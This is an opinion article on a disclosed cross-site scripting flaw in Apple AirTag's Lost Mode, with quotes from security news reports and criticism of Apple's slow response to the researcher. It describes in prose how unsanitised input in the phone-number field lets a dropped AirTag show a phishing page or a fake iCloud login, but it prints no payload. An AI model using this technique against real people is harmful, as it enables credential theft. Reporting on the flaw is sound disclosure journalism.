One of the more frightening facts about mobile IT in 2021 is that simplicity and convenience are far too tempting in small devices (think AppleWatch, AirTags, even rings that track health conditions, smart headphones, etc.).
Compared with their laptop and desktop ancestors, they make it far more difficult to check that URLs are proper, that SPAM/malware texts/emails don’t get opened and that emlpoyees follow the minimal cybersecurity precautions IT asks. In short, as convenience ramps up, so do security risks. (Confession: Even though I try to be ultra-vigilant with desktop emails, I do periodically — far more often than I should — drop my guard on a message coming through my AppleWatch.)
Another of the always-has-been, always-will-be cybersecurity realities is that small programming errors are easy to make and often get overlooked. And yet, those small errors can lead to gargantuan security holes. This brings us to Apple and Airtags.
A security researcher has come to the CISO rescue and found that an open area for typing in a phone number has unintentionally turned AirTags into God’s gift to malware criminals.
Let’s turn to Ars Technica for details on the disaster.
“Security consultant and penetration tester Bobby Rauch discovered that Apple’s AirTags — tiny devices which can be affixed to frequently lost items like laptops, phones, or car keys — don’t sanitize user input. This oversight opens the door for AirTags to be used in a drop attack. Instead of seeding a target’s parking lot with USB drives loaded with malware, an attacker can drop a maliciously prepared AirTag,” the publication reported.
“This kind of attack doesn’t need much technological know-how — the attacker simply types valid XSS into the AirTag’s phone number field, then puts the AirTag in Lost mode and drops it somewhere the target is likely to find it. In theory, scanning a lost AirTag is a safe action — it’s only supposed to pop up a webpage at https://found.apple.com/. The problem is that found.apple.com then embeds the contents of the phone number field in the website as displayed on the victim’s browser, unsanitized.”
The worst part about this hole is that the damage it can inflict is only limited by the attacker’s creativity. By being able to enter almost any URL into that window, coupled by the fact that victims are unlikely going to bother to meaningfully investigate what is happening, the bad options are all but limitless.
More from Ars Technica: “If found, apple.com innocently embeds the XSS above into the response for a scanned AirTag, the victim gets a popup window which displays the contents of badside.tld/page.html. This might be a zero-day exploit for the browser or simply a phishing dialog. Rauch hypothesizes a fake iCloud login dialog, which can be made to look just like the real thing — but which dumps the victim’s Apple credentials onto the target’s server instead,” the story said. “Although this is a compelling exploit, it’s by no means the only one available — just about anything you can do with a webpage is on the table and available. That ranges from simple phishing as seen in the above example to exposing the victim’s phone to a zero-day no-click browser vulnerability.”
Rauch posted far more details at Medium.
This is why the convenience of devices such as AirTags is dangerous. Their small size and single-function capability persona make them appear innocuous, which they absolutely are not. Any device that can communicate to anyone or anything at the device’s whim (and, yes, I am looking at you IoT and IIoT door locks, lightbulbs, temperature sensors and the like) is a major threat. It’s a threat to consumers, but it is a far more dangerous threat to enterprise IT and security operations.
That’s because when employees and contractors (not to mention distributors, suppliers, partners and even large customers with network credentials) interact with these small devices, they tend to forget every cybersecurity training instruction. End-users who are vigilant about email on their desktop (which isn’t everyone, sad to say) will still drop the ball on ultra-convenient small devices, as would I. We shouldn’t, but we do.
And that “we shouldn’t” deserves more context. Some of these devices — AirTags and smartwatches included — make cybersecurity vigilance on the part of end users all but impossible. This AirTag nightmare is just another reminder of this fact.
KrebsOnSecurity delved into some of the more frightening elements of this AirTags issue.
“The AirTag’s Lost Mode lets users alert Apple when an AirTag is missing. Setting it to Lost Mode generates a unique URL at https://found.apple.com, and allows the user to enter a personal message and contact phone number. Anyone who finds the AirTag and scans it with an Apple or Android phone will immediately see that unique Apple URL with the owner’s message,” KrebsOnSecurity noted. “When scanned, an AirTag in Lost Mode will present a short message asking the finder to call the owner at at their specified phone number. This information pops up without asking the finder to log in or provide any personal information. But your average Good Samaritan might not know this.”
That’s a fine explanation of the danger, but the more intriguing part is how lackadaisical Apple is being about this hole — a pattern I have seen repeatedly with Apple. The company says it cares, but its inaction says otherwise.
“Rauch contacted Apple about the bug on June 20, but, for three months, when he inquired about it, the company would say only that it was still investigating. Last Thursday, the company sent Rauch a follow-up email stating they planned to address the weakness in an upcoming update, and in the meantime would he mind not talking about it publicly?” KrebsOnSecurity reported. “Rauch said Apple never acknowledged basic questions he asked about the bug, such as if they had a timeline for fixing it, and if so whether they planned to credit him in the accompanying security advisory. Or whether his submission would qualify for Apple’s bug bounty program, which promises financial rewards of up to $1 million for security researchers who report security bugs in Apple products. Rauch said he’s reported many software vulnerabilities to other vendors over the years, and that Apple’s lack of communication prompted him to go public with his findings — even though Apple says staying quiet about a bug until it is fixed is how researchers qualify for recognition in security advisories.”
First, Rauch is absolutely correct here. When any vendor asks for security issues, they harm their users and the industry by sitting on it for months — or longer. And by not quickly alerting a researcher about whether they will get paid or not, they’re giving the researcher little choice other than to alert the public.
At the very least, the vendor needs to be explicit and specific about when a patch will be rolled out. Here’s the kicker: If Apple can’t get to it for awhile, there is an obligation to report the hole to potential victims so that they engage in behavior to avoid the hole. Fixing the hole is obviously far better, but if Apple won’t do that quickly, it’s creating an untenable situation.
This is the age-old bug disclosure problem, a problem that these bounty programs were supposed to address. Pre-patch disclosure runs the risk of flagging the hole to cyberthieves, who might rush to take advantage of them. That said, it’s not like some attackers don’t already know of the hole. In that case, Apple’s inaction is doing nothing more than leaving victims open to attack.
Apple’s behavior is infuriating. By having a bounty program that ties payment promises with requests for silence, the company has an obligation to take both elements seriously. If it has such a program and then takes far too long to do anything about these holes, it undermines the whole program, along with consumers and enterprises alike.